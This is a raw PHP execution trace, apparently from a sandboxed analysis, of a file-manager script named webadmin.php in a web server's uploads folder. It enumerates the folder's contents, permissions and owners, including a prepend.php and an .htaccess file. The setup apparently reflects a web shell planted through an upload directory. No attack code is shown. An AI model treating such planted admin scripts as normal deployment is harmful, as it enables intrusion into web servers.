4	79	0	0.004828	795048	fileatime	0		/var/www/html/uploads/webadmin.php	872	1	'/var/www/html/uploads/..'
4	79	1	0.004841	795088
4	79	R			1676243916
4	80	0	0.004854	795048	filectime	0		/var/www/html/uploads/webadmin.php	873	1	'/var/www/html/uploads/..'
4	80	1	0.004871	795088
4	80	R			1676243916
3		A						/var/www/html/uploads/webadmin.php	873	$file = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916]
4	81	0	0.004910	795104	file_exists	0		/var/www/html/uploads/webadmin.php	877	1	'/var/www/html/uploads/../.'
4	81	1	0.004925	795144
4	81	R			TRUE
3		A						/var/www/html/uploads/webadmin.php	877	$file['is_executable'] = TRUE
4	82	0	0.004950	795048	function_exists	0		/var/www/html/uploads/webadmin.php	888	1	'posix_getpwuid'
4	82	1	0.004963	795088
4	82	R			TRUE
4	83	0	0.004976	795048	posix_getpwuid	0		/var/www/html/uploads/webadmin.php	888	1	0
4	83	1	0.004999	795848
4	83	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	84	0	0.005022	795816	reset	0		/var/www/html/uploads/webadmin.php	888	1	['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	84	1	0.005041	796224
4	84	R			'root'
3		A						/var/www/html/uploads/webadmin.php	888	$file['owner_name'] = 'root'
4	85	0	0.005065	795080	function_exists	0		/var/www/html/uploads/webadmin.php	889	1	'posix_getgrgid'
4	85	1	0.005079	795120
4	85	R			TRUE
4	86	0	0.005091	795080	posix_getgrgid	0		/var/www/html/uploads/webadmin.php	889	1	0
4	86	1	0.005112	795736
4	86	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	87	0	0.005132	795704	reset	0		/var/www/html/uploads/webadmin.php	889	1	['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	87	1	0.005148	796112
4	87	R			'root'
3		A						/var/www/html/uploads/webadmin.php	889	$file['group_name'] = 'root'
3		A						/var/www/html/uploads/webadmin.php	891	$files[] = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	88	0	0.005201	795752	readdir	0		/var/www/html/uploads/webadmin.php	853	1	resource(4) of type (stream)
4	88	1	0.005215	795824
4	88	R			'.'
3		A						/var/www/html/uploads/webadmin.php	853	$filename = '.'
3		A						/var/www/html/uploads/webadmin.php	855	$path = '/var/www/html/uploads/.'
4	89	0	0.005248	795832	lstat	0		/var/www/html/uploads/webadmin.php	857	1	'/var/www/html/uploads/.'
4	89	1	0.005264	797616
4	89	R			[0 => 2049, 1 => 524471, 2 => 16895, 3 => 3, 4 => 0, 5 => 0, 6 => 0, 7 => 4096, 8 => 1676243916, 9 => 1676243916, 10 => 1676243916, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524471, 'mode' => 16895, 'nlink' => 3, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 4096, 'atime' => 1676243916, 'mtime' => 1676243916, 'ctime' => 1676243916, 'blksize' => 4096, 'blocks' => 8]
3		A						/var/www/html/uploads/webadmin.php	857	$stat = [0 => 2049, 1 => 524471, 2 => 16895, 3 => 3, 4 => 0, 5 => 0, 6 => 0, 7 => 4096, 8 => 1676243916, 9 => 1676243916, 10 => 1676243916, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524471, 'mode' => 16895, 'nlink' => 3, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 4096, 'atime' => 1676243916, 'mtime' => 1676243916, 'ctime' => 1676243916, 'blksize' => 4096, 'blocks' => 8]
4	90	0	0.005324	796520	is_file	0		/var/www/html/uploads/webadmin.php	862	1	'/var/www/html/uploads/.'
4	90	1	0.005338	796552
4	90	R			FALSE
4	91	0	0.005352	796512	is_dir	0		/var/www/html/uploads/webadmin.php	863	1	'/var/www/html/uploads/.'
4	91	1	0.005365	796552
4	91	R			TRUE
4	92	0	0.005377	796512	is_link	0		/var/www/html/uploads/webadmin.php	864	1	'/var/www/html/uploads/.'
4	92	1	0.005390	796552
4	92	R			FALSE
4	93	0	0.005402	796512	is_readable	0		/var/www/html/uploads/webadmin.php	865	1	'/var/www/html/uploads/.'
4	93	1	0.005417	796552
4	93	R			TRUE
4	94	0	0.005429	796512	is_writable	0		/var/www/html/uploads/webadmin.php	866	1	'/var/www/html/uploads/.'
4	94	1	0.005444	796552
4	94	R			TRUE
4	95	0	0.005457	796512	filemtime	0		/var/www/html/uploads/webadmin.php	871	1	'/var/www/html/uploads/.'
4	95	1	0.005469	796552
4	95	R			1676243916
4	96	0	0.005482	796512	fileatime	0		/var/www/html/uploads/webadmin.php	872	1	'/var/www/html/uploads/.'
4	96	1	0.005494	796552
4	96	R			1676243916
4	97	0	0.005507	796512	filectime	0		/var/www/html/uploads/webadmin.php	873	1	'/var/www/html/uploads/.'
4	97	1	0.005519	796552
4	97	R			1676243916
3		A						/var/www/html/uploads/webadmin.php	873	$file = ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916]
4	98	0	0.005556	796568	file_exists	0		/var/www/html/uploads/webadmin.php	877	1	'/var/www/html/uploads/./.'
4	98	1	0.005575	796608
4	98	R			TRUE
3		A						/var/www/html/uploads/webadmin.php	877	$file['is_executable'] = TRUE
4	99	0	0.005600	796512	function_exists	0		/var/www/html/uploads/webadmin.php	888	1	'posix_getpwuid'
4	99	1	0.005613	796552
4	99	R			TRUE
4	100	0	0.005626	796512	posix_getpwuid	0		/var/www/html/uploads/webadmin.php	888	1	0
4	100	1	0.005649	797312
4	100	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	101	0	0.005672	797280	reset	0		/var/www/html/uploads/webadmin.php	888	1	['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	101	1	0.005691	797688
4	101	R			'root'
3		A						/var/www/html/uploads/webadmin.php	888	$file['owner_name'] = 'root'
4	102	0	0.005715	796544	function_exists	0		/var/www/html/uploads/webadmin.php	889	1	'posix_getgrgid'
4	102	1	0.005729	796584
4	102	R			TRUE
4	103	0	0.005741	796544	posix_getgrgid	0		/var/www/html/uploads/webadmin.php	889	1	0
4	103	1	0.005763	797200
4	103	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	104	0	0.005783	797168	reset	0		/var/www/html/uploads/webadmin.php	889	1	['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	104	1	0.005799	797576
4	104	R			'root'
3		A						/var/www/html/uploads/webadmin.php	889	$file['group_name'] = 'root'
3		A						/var/www/html/uploads/webadmin.php	891	$files[] = ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	105	0	0.005851	797216	readdir	0		/var/www/html/uploads/webadmin.php	853	1	resource(4) of type (stream)
4	105	1	0.005865	797296
4	105	R			'prepend.php'
3		A						/var/www/html/uploads/webadmin.php	853	$filename = 'prepend.php'
3		A						/var/www/html/uploads/webadmin.php	855	$path = '/var/www/html/uploads/prepend.php'
4	106	0	0.005900	797320	lstat	0		/var/www/html/uploads/webadmin.php	857	1	'/var/www/html/uploads/prepend.php'
4	106	1	0.005917	799128
4	106	R			[0 => 2049, 1 => 524474, 2 => 33261, 3 => 1, 4 => 0, 5 => 0, 6 => 0, 7 => 57, 8 => 1676243916, 9 => 1676243916, 10 => 1676243916, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524474, 'mode' => 33261, 'nlink' => 1, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 57, 'atime' => 1676243916, 'mtime' => 1676243916, 'ctime' => 1676243916, 'blksize' => 4096, 'blocks' => 8]
3		A						/var/www/html/uploads/webadmin.php	857	$stat = [0 => 2049, 1 => 524474, 2 => 33261, 3 => 1, 4 => 0, 5 => 0, 6 => 0, 7 => 57, 8 => 1676243916, 9 => 1676243916, 10 => 1676243916, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524474, 'mode' => 33261, 'nlink' => 1, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 57, 'atime' => 1676243916, 'mtime' => 1676243916, 'ctime' => 1676243916, 'blksize' => 4096, 'blocks' => 8]
4	107	0	0.005978	798032	is_file	0		/var/www/html/uploads/webadmin.php	862	1	'/var/www/html/uploads/prepend.php'
4	107	1	0.005993	798088
4	107	R			TRUE
4	108	0	0.006006	798048	is_dir	0		/var/www/html/uploads/webadmin.php	863	1	'/var/www/html/uploads/prepend.php'
4	108	1	0.006020	798088
4	108	R			FALSE
4	109	0	0.006032	798048	is_link	0		/var/www/html/uploads/webadmin.php	864	1	'/var/www/html/uploads/prepend.php'
4	109	1	0.006045	798088
4	109	R			FALSE
4	110	0	0.006058	798048	is_readable	0		/var/www/html/uploads/webadmin.php	865	1	'/var/www/html/uploads/prepend.php'
4	110	1	0.006073	798088
4	110	R			TRUE
4	111	0	0.006086	798048	is_writable	0		/var/www/html/uploads/webadmin.php	866	1	'/var/www/html/uploads/prepend.php'
4	111	1	0.006100	798088
4	111	R			FALSE
4	112	0	0.006114	798048	filemtime	0		/var/www/html/uploads/webadmin.php	871	1	'/var/www/html/uploads/prepend.php'
4	112	1	0.006127	798088
4	112	R			1676243916
4	113	0	0.006139	798048	fileatime	0		/var/www/html/uploads/webadmin.php	872	1	'/var/www/html/uploads/prepend.php'
4	113	1	0.006152	798088
4	113	R			1676243916
4	114	0	0.006165	798048	filectime	0		/var/www/html/uploads/webadmin.php	873	1	'/var/www/html/uploads/prepend.php'
4	114	1	0.006178	798088
4	114	R			1676243916
3		A						/var/www/html/uploads/webadmin.php	873	$file = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916]
4	115	0	0.006216	798048	is_executable	0		/var/www/html/uploads/webadmin.php	880	1	'/var/www/html/uploads/prepend.php'
4	115	1	0.006231	798088
4	115	R			TRUE
3		A						/var/www/html/uploads/webadmin.php	880	$file['is_executable'] = TRUE
4	116	0	0.006256	798048	function_exists	0		/var/www/html/uploads/webadmin.php	888	1	'posix_getpwuid'
4	116	1	0.006269	798088
4	116	R			TRUE
4	117	0	0.006286	798048	posix_getpwuid	0		/var/www/html/uploads/webadmin.php	888	1	0
4	117	1	0.006309	798848
4	117	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	118	0	0.006332	798816	reset	0		/var/www/html/uploads/webadmin.php	888	1	['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	118	1	0.006351	799224
4	118	R			'root'
3		A						/var/www/html/uploads/webadmin.php	888	$file['owner_name'] = 'root'
4	119	0	0.006376	798080	function_exists	0		/var/www/html/uploads/webadmin.php	889	1	'posix_getgrgid'
4	119	1	0.006389	798120
4	119	R			TRUE
4	120	0	0.006402	798080	posix_getgrgid	0		/var/www/html/uploads/webadmin.php	889	1	0
4	120	1	0.006422	798736
4	120	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	121	0	0.006442	798704	reset	0		/var/www/html/uploads/webadmin.php	889	1	['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	121	1	0.006458	799112
4	121	R			'root'
3		A						/var/www/html/uploads/webadmin.php	889	$file['group_name'] = 'root'
3		A						/var/www/html/uploads/webadmin.php	891	$files[] = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	122	0	0.006510	798752	readdir	0		/var/www/html/uploads/webadmin.php	853	1	resource(4) of type (stream)
4	122	1	0.006524	798824
4	122	R			'data'
3		A						/var/www/html/uploads/webadmin.php	853	$filename = 'data'
3		A						/var/www/html/uploads/webadmin.php	855	$path = '/var/www/html/uploads/data'
4	123	0	0.006558	798840	lstat	0		/var/www/html/uploads/webadmin.php	857	1	'/var/www/html/uploads/data'
4	123	1	0.006574	800624
4	123	R			[0 => 2049, 1 => 524472, 2 => 16895, 3 => 2, 4 => 0, 5 => 0, 6 => 0, 7 => 4096, 8 => 1676243916, 9 => 1676243916, 10 => 1676243916, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524472, 'mode' => 16895, 'nlink' => 2, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 4096, 'atime' => 1676243916, 'mtime' => 1676243916, 'ctime' => 1676243916, 'blksize' => 4096, 'blocks' => 8]
3		A						/var/www/html/uploads/webadmin.php	857	$stat = [0 => 2049, 1 => 524472, 2 => 16895, 3 => 2, 4 => 0, 5 => 0, 6 => 0, 7 => 4096, 8 => 1676243916, 9 => 1676243916, 10 => 1676243916, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524472, 'mode' => 16895, 'nlink' => 2, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 4096, 'atime' => 1676243916, 'mtime' => 1676243916, 'ctime' => 1676243916, 'blksize' => 4096, 'blocks' => 8]
4	124	0	0.006635	799528	is_file	0		/var/www/html/uploads/webadmin.php	862	1	'/var/www/html/uploads/data'
4	124	1	0.006650	799560
4	124	R			FALSE
4	125	0	0.006663	799520	is_dir	0		/var/www/html/uploads/webadmin.php	863	1	'/var/www/html/uploads/data'
4	125	1	0.006676	799560
4	125	R			TRUE
4	126	0	0.006688	799520	is_link	0		/var/www/html/uploads/webadmin.php	864	1	'/var/www/html/uploads/data'
4	126	1	0.006701	799560
4	126	R			FALSE
4	127	0	0.006713	799520	is_readable	0		/var/www/html/uploads/webadmin.php	865	1	'/var/www/html/uploads/data'
4	127	1	0.006728	799560
4	127	R			TRUE
4	128	0	0.006741	799520	is_writable	0		/var/www/html/uploads/webadmin.php	866	1	'/var/www/html/uploads/data'
4	128	1	0.006755	799560
4	128	R			TRUE
4	129	0	0.006768	799520	filemtime	0		/var/www/html/uploads/webadmin.php	871	1	'/var/www/html/uploads/data'
4	129	1	0.006781	799560
4	129	R			1676243916
4	130	0	0.006794	799520	fileatime	0		/var/www/html/uploads/webadmin.php	872	1	'/var/www/html/uploads/data'
4	130	1	0.006806	799560
4	130	R			1676243916
4	131	0	0.006819	799520	filectime	0		/var/www/html/uploads/webadmin.php	873	1	'/var/www/html/uploads/data'
4	131	1	0.006832	799560
4	131	R			1676243916
3		A						/var/www/html/uploads/webadmin.php	873	$file = ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916]
4	132	0	0.006870	799576	file_exists	0		/var/www/html/uploads/webadmin.php	877	1	'/var/www/html/uploads/data/.'
4	132	1	0.006885	799616
4	132	R			TRUE
3		A						/var/www/html/uploads/webadmin.php	877	$file['is_executable'] = TRUE
4	133	0	0.006910	799520	function_exists	0		/var/www/html/uploads/webadmin.php	888	1	'posix_getpwuid'
4	133	1	0.006923	799560
4	133	R			TRUE
4	134	0	0.006936	799520	posix_getpwuid	0		/var/www/html/uploads/webadmin.php	888	1	0
4	134	1	0.006958	800320
4	134	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	135	0	0.006981	800288	reset	0		/var/www/html/uploads/webadmin.php	888	1	['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	135	1	0.007004	800696
4	135	R			'root'
3		A						/var/www/html/uploads/webadmin.php	888	$file['owner_name'] = 'root'
4	136	0	0.007035	799552	function_exists	0		/var/www/html/uploads/webadmin.php	889	1	'posix_getgrgid'
4	136	1	0.007049	799592
4	136	R			TRUE
4	137	0	0.007062	799552	posix_getgrgid	0		/var/www/html/uploads/webadmin.php	889	1	0
4	137	1	0.007084	800208
4	137	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	138	0	0.007104	800176	reset	0		/var/www/html/uploads/webadmin.php	889	1	['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	138	1	0.007120	800584
4	138	R			'root'
3		A						/var/www/html/uploads/webadmin.php	889	$file['group_name'] = 'root'
3		A						/var/www/html/uploads/webadmin.php	891	$files[] = ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	139	0	0.007173	800224	readdir	0		/var/www/html/uploads/webadmin.php	853	1	resource(4) of type (stream)
4	139	1	0.007187	800304
4	139	R			'.htaccess'
3		A						/var/www/html/uploads/webadmin.php	853	$filename = '.htaccess'
3		A						/var/www/html/uploads/webadmin.php	855	$path = '/var/www/html/uploads/.htaccess'
4	140	0	0.007222	800320	lstat	0		/var/www/html/uploads/webadmin.php	857	1	'/var/www/html/uploads/.htaccess'
4	140	1	0.007238	802112
4	140	R			[0 => 2049, 1 => 524473, 2 => 33188, 3 => 1, 4 => 0, 5 => 0, 6 => 0, 7 => 64, 8 => 1676243916, 9 => 1676243916, 10 => 1676243916, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524473, 'mode' => 33188, 'nlink' => 1, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 64, 'atime' => 1676243916, 'mtime' => 1676243916, 'ctime' => 1676243916, 'blksize' => 4096, 'blocks' => 8]
3		A						/var/www/html/uploads/webadmin.php	857	$stat = [0 => 2049, 1 => 524473, 2 => 33188, 3 => 1, 4 => 0, 5 => 0, 6 => 0, 7 => 64, 8 => 1676243916, 9 => 1676243916, 10 => 1676243916, 11 => 4096, 12 => 8, 'dev' => 2049, 'ino' => 524473, 'mode' => 33188, 'nlink' => 1, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 64, 'atime' => 1676243916, 'mtime' => 1676243916, 'ctime' => 1676243916, 'blksize' => 4096, 'blocks' => 8]
4	141	0	0.007299	801016	is_file	0		/var/www/html/uploads/webadmin.php	862	1	'/var/www/html/uploads/.htaccess'
4	141	1	0.007314	801056
4	141	R			TRUE
4	142	0	0.007327	801016	is_dir	0		/var/www/html/uploads/webadmin.php	863	1	'/var/www/html/uploads/.htaccess'
4	142	1	0.007340	801056
4	142	R			FALSE
4	143	0	0.007353	801016	is_link	0		/var/www/html/uploads/webadmin.php	864	1	'/var/www/html/uploads/.htaccess'
4	143	1	0.007365	801056
4	143	R			FALSE
4	144	0	0.007378	801016	is_readable	0		/var/www/html/uploads/webadmin.php	865	1	'/var/www/html/uploads/.htaccess'
4	144	1	0.007393	801056
4	144	R			TRUE
4	145	0	0.007405	801016	is_writable	0		/var/www/html/uploads/webadmin.php	866	1	'/var/www/html/uploads/.htaccess'
4	145	1	0.007420	801056
4	145	R			FALSE
4	146	0	0.007433	801016	filemtime	0		/var/www/html/uploads/webadmin.php	871	1	'/var/www/html/uploads/.htaccess'
4	146	1	0.007446	801056
4	146	R			1676243916
4	147	0	0.007468	801016	fileatime	0		/var/www/html/uploads/webadmin.php	872	1	'/var/www/html/uploads/.htaccess'
4	147	1	0.007481	801056
4	147	R			1676243916
4	148	0	0.007494	801016	filectime	0		/var/www/html/uploads/webadmin.php	873	1	'/var/www/html/uploads/.htaccess'
4	148	1	0.007506	801056
4	148	R			1676243916
3		A						/var/www/html/uploads/webadmin.php	873	$file = ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916]
4	149	0	0.007545	801016	is_executable	0		/var/www/html/uploads/webadmin.php	880	1	'/var/www/html/uploads/.htaccess'
4	149	1	0.007560	801056
4	149	R			FALSE
3		A						/var/www/html/uploads/webadmin.php	880	$file['is_executable'] = FALSE
4	150	0	0.007586	801016	function_exists	0		/var/www/html/uploads/webadmin.php	888	1	'posix_getpwuid'
4	150	1	0.007599	801056
4	150	R			TRUE
4	151	0	0.007612	801016	posix_getpwuid	0		/var/www/html/uploads/webadmin.php	888	1	0
4	151	1	0.007635	801816
4	151	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	152	0	0.007658	801784	reset	0		/var/www/html/uploads/webadmin.php	888	1	['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	152	1	0.007676	802192
4	152	R			'root'
3		A						/var/www/html/uploads/webadmin.php	888	$file['owner_name'] = 'root'
4	153	0	0.007701	801048	function_exists	0		/var/www/html/uploads/webadmin.php	889	1	'posix_getgrgid'
4	153	1	0.007719	801088
4	153	R			TRUE
4	154	0	0.007732	801048	posix_getgrgid	0		/var/www/html/uploads/webadmin.php	889	1	0
4	154	1	0.007754	801704
4	154	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	155	0	0.007774	801672	reset	0		/var/www/html/uploads/webadmin.php	889	1	['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	155	1	0.007790	802080
4	155	R			'root'
3		A						/var/www/html/uploads/webadmin.php	889	$file['group_name'] = 'root'
3		A						/var/www/html/uploads/webadmin.php	891	$files[] = ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
4	156	0	0.007843	801720	readdir	0		/var/www/html/uploads/webadmin.php	853	1	resource(4) of type (stream)
4	156	1	0.007877	801760
4	156	R			FALSE
3		A						/var/www/html/uploads/webadmin.php	853	$filename = FALSE
3	52	1	0.007904	799968
3	52	R			[0 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
2		A						/var/www/html/uploads/webadmin.php	1186	$list = [0 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
3	157	0	0.008047	799968	array_key_exists	0		/var/www/html/uploads/webadmin.php	1188	2	'sort'	[]
